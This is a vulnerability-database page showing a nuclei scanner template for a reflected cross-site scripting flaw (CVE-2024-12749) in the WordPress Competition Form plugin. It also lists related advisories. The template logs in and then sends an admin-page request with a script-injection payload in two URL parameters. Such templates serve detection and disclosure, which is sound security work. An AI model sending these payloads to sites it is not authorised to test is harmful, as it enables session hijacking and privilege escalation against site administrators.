Lucene search
K

WordPress Competition Form Plugin <= 2.0 - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Reflected cross-site scripting in WordPress Competition Form Plugin up to version 2.0 via crafted page.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12749
29 Jan 202506:05
circl
CNNVD
WordPress plugin Competition Form 安全漏洞
29 Jan 202500:00
cnnvd
CVE
CVE-2024-12749
29 Jan 202506:00
cve
Cvelist
CVE-2024-12749 Competition Form <= 2.0 - Reflected XSS
29 Jan 202506:00
cvelist
EUVD
EUVD-2024-51085
3 Oct 202520:07
euvd
NVD
CVE-2024-12749
29 Jan 202506:15
nvd
OSV
CVE-2024-12749
29 Jan 202506:15
osv
Patchstack
WordPress Competition Form plugin <= 2.0 - Reflected XSS vulnerability
29 Jan 202507:33
patchstack
Positive Technologies
PT-2025-1944
29 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-12749
23 May 202507:10
redhatcve
Rows per page
id: CVE-2024-12749

info:
  name: WordPress Competition Form Plugin <= 2.0 - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Competition Form WordPress plugin <= 2.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires victim to visit a maliciously crafted page.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/478316b9-9f47-4aa6-92c6-03879f16a3e5/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12749
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-12749
    cwe-id: CWE-79
    epss-score: 0.00566
    epss-percentile: 0.42871
    cpe: cpe:2.3:a:raiserweb:competition_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: raiserweb
    product: competition_form
  tags: cve,cve2024,competition-form,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=entries&competition_id={$competition_id}"></script><script>alert(document.domain)</script><script>&paged={$paged}"></script><script>alert(document.domain)</script><script>&action=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "></script><script>alert(document.domain)</script><script>", "Select Competition")
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 4b0a004830460221009a7cdc1b3405a91c069b90b147345f6643e640bace02a122df2b7ec5f36f543e022100cd63b3e9be1a124481943af8bbb1c845f2f249b951a7d4a318488db80f76c7a7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 15:53Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.1
EPSS0.00566
SSVC
6